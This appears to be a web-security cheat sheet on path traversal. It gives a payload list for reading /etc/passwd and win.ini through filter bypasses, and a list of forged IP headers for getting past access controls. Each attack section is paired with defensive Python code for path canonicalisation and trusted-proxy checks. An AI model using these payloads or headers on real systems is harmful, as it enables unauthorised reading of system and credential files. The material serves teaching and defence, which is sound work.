# Path Traversal

1. The application blocks traversal sequences but treats the supplied filename as relative to an absolute base path; it can be exploited with an absolute path to the target file, e.g. the `/etc/passwd` payload.
2. Images on the target are loaded via the `filename` parameter, and the application defends against traversal by stripping traversal sequences. Nested sequences that collapse back into `../` after stripping, such as the `....//....//....//....//etc/passwd` payload, bypass it.
3. A superfluously URL-encoded payload such as `..%252f..%252f..%252fetc/passwd` can bypass the application's security controls.
4. The application requires the supplied filename to start with the expected base folder; keeping that folder at the beginning and appending the traversal after it, as in `/var/www/images/../../../etc/passwd`, bypasses the protection.
5. A **null** byte at the end of the path followed by an image extension fools application checks that an image is being requested; the `../../../etc/passwd%00.png` payload succeeds.
6. Double URL-encode the traversal path; for example `../../../../../../../../../../etc/hostname` double-encodes to `%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fhostname`.
7. Windows accepts both `../` and `..\` as directory traversal syntax; for example, requesting `loadImage?filename=..\..\..\windows\win.ini` on a Windows target is a way to ***identify*** a valid path traversal.

Intruder payload list:

```
/etc/passwd
....//....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd
/var/www/images/../../../etc/passwd
../../../etc/passwd%00.png
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
```
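The bypasses above all exploit the same mistake: the application checks the filename before it has been fully decoded and canonicalized. The following Python is an added example (not from the page or any project it describes) that puts a strip-once filter of the kind items 1 and 2 defeat next to a hardened resolver that percent-decodes, rejects null bytes, normalises `\` to `/`, and then checks that the canonical path is still inside the image root. The root `/var/www/images` is taken from the page's own payload and is otherwise an assumption; the payload list is the page's, reused as test input.

```python
import os
import urllib.parse
from typing import List, Optional

# Assumed web root for served images; the page only shows it inside a payload.
IMAGE_ROOT = "/var/www/images"

# Payloads from the page, reused here as inputs the hardened resolver must
# keep inside IMAGE_ROOT (the Windows form from item 7 is included too).
PAYLOADS: List[str] = [
    "/etc/passwd",
    "....//....//....//....//etc/passwd",
    "..%252f..%252f..%252fetc/passwd",
    "/var/www/images/../../../etc/passwd",
    "../../../etc/passwd%00.png",
    "%252e%252e%252f" * 10 + "etc%252fpasswd",
    "..\\..\\..\\windows\\win.ini",
]


def naive_resolve(filename: str, root: str = IMAGE_ROOT) -> str:
    """Deliberately weak filter: strips '../' a single time, then joins.
    Nested sequences ('....//') survive the strip and collapse back into
    '../', and an absolute filename makes os.path.join discard the root."""
    stripped = filename.replace("../", "")
    return os.path.normpath(os.path.join(root, stripped))


def percent_decode(value: str, rounds: int = 3) -> str:
    """Decode repeatedly (bounded) so double encoding cannot hide '.' or '/'
    from the checks that follow."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_image_path(filename: str, root: str = IMAGE_ROOT) -> Optional[str]:
    """Return the canonical path to serve, or None if the request leaves root."""
    decoded = percent_decode(filename)
    if "\x00" in decoded:                   # null-byte truncation trick
        return None
    decoded = decoded.replace("\\", "/")    # treat '\' as a separator as well
    # join() drops root for an absolute filename and normpath() collapses
    # '..'; the containment check below catches both outcomes.
    candidate = os.path.normpath(os.path.join(root, decoded))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def escapes_root(path: str, root: str = IMAGE_ROOT) -> bool:
    """True when a resolved path lies outside root (used by the demo below)."""
    return os.path.commonpath([root, path]) != root


if __name__ == "__main__":
    for payload in PAYLOADS:
        naive = naive_resolve(payload)
        print(f"{payload!r:48} naive={naive!r} escapes={escapes_root(naive)} "
              f"hardened={resolve_image_path(payload)!r}")
```

`os.path.commonpath` is used instead of `str.startswith(root)` so that a sibling directory such as `/var/www/images_old` is not mistaken for the root. A resolved path that stays inside the root (for example the nested `....//` form, which is harmless once no single-pass stripping is done) is simply served if the file exists and 404s otherwise.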

## Headers to bypass access to files

```
X-Custom-IP-Authorization: 127.0.0.1
X-Forwarded-For: localhost
X-Forward-For: localhost
X-Remote-IP: localhost
X-Client-IP: localhost
X-Real-IP: localhost

X-Originating-IP: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
```
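These headers work because an application grants "local" access based on a client-controlled header instead of the actual TCP peer. The Python below is an added example (not code from the page) of the defensive rule: only `X-Forwarded-For` is consulted, only when the peer is a known reverse proxy, and it is walked right to left so that values prepended by the client are skipped; every other name in the list above is treated purely as a tampering indicator. The trusted-proxy network `10.0.0.0/8` and the sample addresses are constructed assumptions.

```python
import ipaddress
from typing import List, Mapping

# Assumed: the only hops allowed to set forwarding headers live in this
# reverse-proxy network (constructed value, not from the page).
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

# Header names from the page's list: all are client-supplied and must never
# decide on their own whether a request is "local".
SPOOFABLE_IP_HEADERS = {
    "x-custom-ip-authorization", "x-forwarded-for", "x-forward-for",
    "x-remote-ip", "x-client-ip", "x-real-ip", "x-originating-ip",
    "x-forwarded", "forwarded-for", "x-remote-addr", "x-proxyuser-ip",
    "x-original-url", "client-ip", "true-client-ip", "cluster-client-ip",
}


def _is_trusted_proxy(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr: str, headers: Mapping[str, str]) -> str:
    """Address to use for access decisions.

    A direct connection from an untrusted peer returns the peer itself, so
    no header can promote it to 127.0.0.1. Behind a trusted proxy the
    X-Forwarded-For chain is walked from the right, skipping proxy hops, so
    a client that sends 'X-Forwarded-For: 127.0.0.1' merely adds a leftmost
    entry that is never reached."""
    peer = ipaddress.ip_address(remote_addr)
    if not _is_trusted_proxy(peer):
        return str(peer)
    lowered = {k.lower(): v for k, v in headers.items()}
    hops = [h.strip() for h in lowered.get("x-forwarded-for", "").split(",")]
    for hop in reversed([h for h in hops if h]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)   # 'localhost' or garbage: do not guess
        if not _is_trusted_proxy(addr):
            return str(addr)
    return str(peer)           # every hop was a proxy; treat proxy as client


def is_local_client(remote_addr: str, headers: Mapping[str, str]) -> bool:
    """The check an application should use before serving 'internal only' files."""
    return ipaddress.ip_address(client_ip(remote_addr, headers)).is_loopback


def spoofable_headers_present(headers: Mapping[str, str]) -> List[str]:
    """Detection aid: header names from the list seen on a request, worth
    logging when they arrive on a connection that is not from a proxy."""
    return sorted(k for k in headers if k.lower() in SPOOFABLE_IP_HEADERS)


if __name__ == "__main__":
    # Constructed request: direct client trying the page's headers.
    direct = {"X-Forwarded-For": "localhost", "X-Real-IP": "127.0.0.1"}
    print(client_ip("203.0.113.5", direct), is_local_client("203.0.113.5", direct))
    print(spoofable_headers_present(direct))
    # Constructed request: same client behind a trusted proxy that appended it.
    proxied = {"X-Forwarded-For": "127.0.0.1, 203.0.113.5"}
    print(client_ip("10.0.0.2", proxied), is_local_client("10.0.0.2", proxied))
```

The proxy itself must also overwrite, not append to, any of these headers it does not intend to forward; otherwise a client-supplied `X-Real-IP` reaches the application unchanged even though the application never asked the proxy to set it.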
